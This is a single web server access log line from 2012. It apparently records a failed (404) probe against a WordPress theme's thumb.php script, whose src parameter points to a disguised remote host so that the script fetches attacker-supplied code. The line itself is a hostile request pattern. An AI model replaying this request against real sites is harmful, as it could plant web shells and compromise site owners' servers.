184.106.130.234 - - [14/May/2012:09:16:32 +0200] "GET /stats/log.keys.html//wp-content/themes/welcome_inn/thumb.php?src=http://img.youtube.com.mumsandbabes.com.my/txt/upload.php HTTP/1.1" 404 342 "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5"
